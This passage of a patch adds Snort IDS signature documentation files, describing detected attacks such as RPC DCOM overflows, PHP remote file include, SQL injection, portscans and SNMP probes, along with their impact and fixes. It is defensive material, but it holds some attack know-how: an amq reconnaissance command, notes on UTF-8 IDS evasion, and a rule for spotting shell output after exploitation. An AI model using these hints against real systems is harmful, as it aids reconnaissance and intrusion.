+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1420.txt
@@ -0,0 +1,77 @@
+Rule:
+ 
+--
+Sid:
+1420
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over TCP to an SNMP
+daemon is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 162, tcp or udp.
+
+An attacker may attempt to send this request to determine if a device is
+using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to tcp port 162, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+
+--
--- /dev/null
+++ b/doc/signatures/1373.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1373
+
+--
+Summary:
+Attempted httpd configuration access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the configuration of a webserver. The httpd.conf file lists the configuration of the webserver including modules loaded on start and access authorization files. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'conf/httpd.conf'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Making the file read only by the superuser on the system will disallow viewing of the file by other users.
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/699.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+699
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000497.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000497
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Calendarix" application running on a webserver. Access to 
+the file "cal_event.php" with SQL commands being passed as the "id" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "cal_event.php" script used by the 
+"Calendarix" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Calendarix
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000371.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000371
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_ranks.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_ranks.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/579.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+579
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) mountd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port mountd is using.  Attackers can also learn what versions of the mountd protocol are accepted by mountd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as mountd run.  The mountd RPC service allows remote file system access through Network File System (NFS).  A vulnerability exists in the code that logs NFS mount activity that can cause a buffer overflow, allowing the execution of arbitrary code with root privileges.
+
+--
+Affected Systems:
+Caldera OpenLinux Standard 1.2
+RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where mountd runs.  This may be a precursor to accessing mountd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access mountd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for mountd, not probes of the mountd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the mountd service itself. An attacker may attempt to go directly to the mountd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/121
+
+CERT
+http://www.cert.org/advisories/CA-1998-12.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS13
+
+
+--
--- /dev/null
+++ b/doc/signatures/1885.txt
@@ -0,0 +1,72 @@
+Rule:
+
+
+--
+Sid: 
+
+1885
+
+-- 
+Summary: 
+This rule has been placed in deleted.rules
+
+-- 
+Impact: 
+
+attacker might have gained an ability to execute commands
+remotely on the system.
+
+--
+Detailed Information:
+
+This signature triggers when a UNIX "id" command is used to confirm
+the user name of the currently logged in user over any unencrypted
+connection. Such connection can be either a legitimate telnet
+connection or a result of spawning a shell on FTP, POP3, SMTP or other
+port as a consequence of network exploit. The string "uid=" and
+"(http)" is an output of an "id" command indicating that the user
+has "http" account privileges, typically used by the web server
+process.  Seeing such a response indicates that some user connected
+over the network to a target web server and likely exploited the web
+server to launch a shell.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+
+a buffer overflow exploit against the WWW server
+results in "/bin/sh" being executed. An automated script performing an
+attack, checks for the success of the exploit via an "id" command.
+
+-- 
+Ease of Attack: 
+
+this post-attack behavior can accompany different attacks
+
+-- 
+False Positives:
+None Known
+
+the signature will trigger if a legitimate system
+administrator executes the "id" command over the telnet connection
+which uses one of the web ports, as defined in snort.conf
+
+--
+False Negatives: not known
+
+-- 
+Corrective Action:
+
+investigate the server for signs of compromise, run
+the integrity checking software, look for other IDS alerts involving
+the same IP addresses.
+
+--
+Contributors: Anton Chuvakin <anton@chuvakin.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000812.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000812
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SimpleBoard SBP" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "sbp" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "sbp" parameter in the "index.php" script used by the "SimpleBoard SBP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SimpleBoard SBP
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/457.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+457
+
+--
+Summary:
+This event is generated when an ICMP type 14 is detected that does not 
+include the necessary code in the packet.
+
+
+--
+Impact:
+
+Can be used as a reconnaissance tool.  Traceroute reveals information
+about the layout of a network.
+
+--
+Detailed Information:
+There are at least three different implementations of traceroute.  In
+one implementation traceroute works by sending an ICMP Echo Request
+packet to a destination host with a TTL value of 1.  If the host is more
+than one hop away, the first route that receives the back will send back
+an ICMP packet indicating that the TTL was exceeded.  The address of
+this router is then listed as the first hop.  The packet is then sent
+out again with a TTL of 2.  This continues until the destination host is
+able to reply or some maximum TTL value is reached.
+
+The other two implementations use the same TTL-based concept with an
+ICMP type of 30(traceroute) or with an UDP packet destined for an
+ephemeral port.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+
+Traceroute is often used against machines on a network prior to an
+attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP type 30 messages.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Miscellaneous
+http://www.faqs.org/rfcs/rfc1393.html
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/119-6.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+119-6
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects a
+web request that is using UTF-8 encoding. This may indicate an attempt
+to evade an IDS by obfuscating the request using UTF-8.
+
+--
+Affected Systems:
+	All web servers.
+
+--
+Attack Scenarios: 
+An attacker merely needs to encode the request using UTF-8 encoding.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+This may be legitimate behavior. Web clients may use this encoding.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/3350.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3350
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-14.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-14
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+filtered decoy protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2209.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2209
+
+--
+Summary:
+This event is generated when an attempt is made to access getdoc.cgi on an internal web server. This may indicate an attempt to exploit an authorization bypass vulnerability on Infonautics document subscription sites.
+
+--
+Impact:
+A malicious user may be able to access restricted documents without paying for them.
+
+--
+Detailed Information:
+Infonautics provides online access to research materials, and uses getdoc.cgi to manage the document purchase and view process. A malicious user could alter the content of getdoc.cgi links in order to bypass the payment page, thereby freely viewing documents that they would normally pay money to access.
+
+--
+Affected Systems:
+Infonautics web sites that use getdoc.cgi to manage document access.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to an Infonautics site, and obtains documents that he/she would normally have to pay for.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+If a legitimate user accesses getdoc.cgi on an internal web server, this rule may generate an event.
+ 
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if a fix has been made available.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1032.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1032
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/889.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+889
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1954.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1954
+
+--
+Summary:
+This event is generated when a request is made to discover the Process ID (PID) of the Remote Procedure Call (RPC) amd.
+
+--
+Impact:
+Information disclosure.  This request can allow an attacker to discover the PID associated with amd.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts.  The amd  service automatically mounts and unmounts requested file systems.  An attacker can make a request to amd to discover its PID.  Learning the PID may help an attacker guess a range of likely PIDs associated with other running services that are either started before or after amd.  This may facilitate an attack against other running processes.  
+
+--
+Affected Systems:
+Any system running amd.
+
+--
+Attack Scenarios:
+An attacker may request the PID associated with amd.  This information may be used to attack other running processes if the attacker has some means of access to the target host. 
+
+--
+Ease of Attack:
+Simple.  Execute the command 'amq -p -U -h hostname/IP'.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3376.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3376
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000318.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000318
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "phpBazar" application running on a webserver. 
+Access to the file "admin.php" using a remote file being passed as the 
+"action=edit_member&value=1" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "action=edit_member&value=1" parameter in the 
+"admin.php" script used by the "phpBazar" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpBazar
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1591.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1591
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1988.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1988
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
